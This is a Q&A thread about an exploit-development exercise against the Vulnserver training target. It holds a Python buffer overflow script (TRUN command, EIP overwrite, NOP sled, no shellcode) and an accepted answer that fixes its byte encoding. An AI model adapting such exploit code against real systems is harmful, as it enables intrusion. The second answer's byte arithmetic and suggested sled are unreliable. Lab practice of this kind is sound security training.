Vulnserver - Buffer overflow NOP characters aren't being passed in properly

Question

I'm currently working on a buffer overflow test on the vulnserver app. Overflowing the buffer with hex values of A seemed to be passed into the program without an issue. The EIP was overwritten without an issue as well. However when I begin the NOP sled, after each NOP value a C2 hex value is passed in after. Not sure why this is happening. I have the hex dump to show you exactly what I mean:

Here is the python script I'm using to create the overflow:

import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("127.0.0.1",9999))
buff = '\x41' * 2006
shellcode = ...
nop = '\x90' * 16

#shellcode not included in this test. Trying to find out why NOP sled isn't being passed correctly.
overflow = 'TRUN .' + buff + '\x05\x12\x50\x62' + nop
s.send(overflow.encode())

I'm wondering if the error is occurring when python is encoding/sending the packets or if its occurring simply due to the way vulnserver was written.

score 6 · Accepted Answer · answered Mar 06 '17 at 19:57

Your issue is due to you using Python 3.

The .encode() method is the root cause of your problem.

Try this instead:

import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("127.0.0.1",9999))
buff = b'\x41' * 2006
shellcode = b'...'
nop = b'\x90' * 16

#shellcode not included in this test. Trying to find out why NOP sled isn't being passed correctly.
overflow = b'TRUN .' + buff + b'\x05\x12\x50\x62' + nop
s.send(overflow)

wait, but why?! encode function has a bug?! – Mustafa Chelik May 08 '23 at 03:54 — Mustafa Chelik, May 08 '23 at 03:54

score 0 · Answer 2 · answered Feb 25 '16 at 13:06

0

\xC2-\x90=\x32. Have you tried sending your nop sled as \x5E\x90\x5E\x90\x5E\x90 ?

answered Feb 25 '16 at 13:06

wireghoul

121
10

Vulnserver - Buffer overflow NOP characters aren't being passed in properly

2 Answers2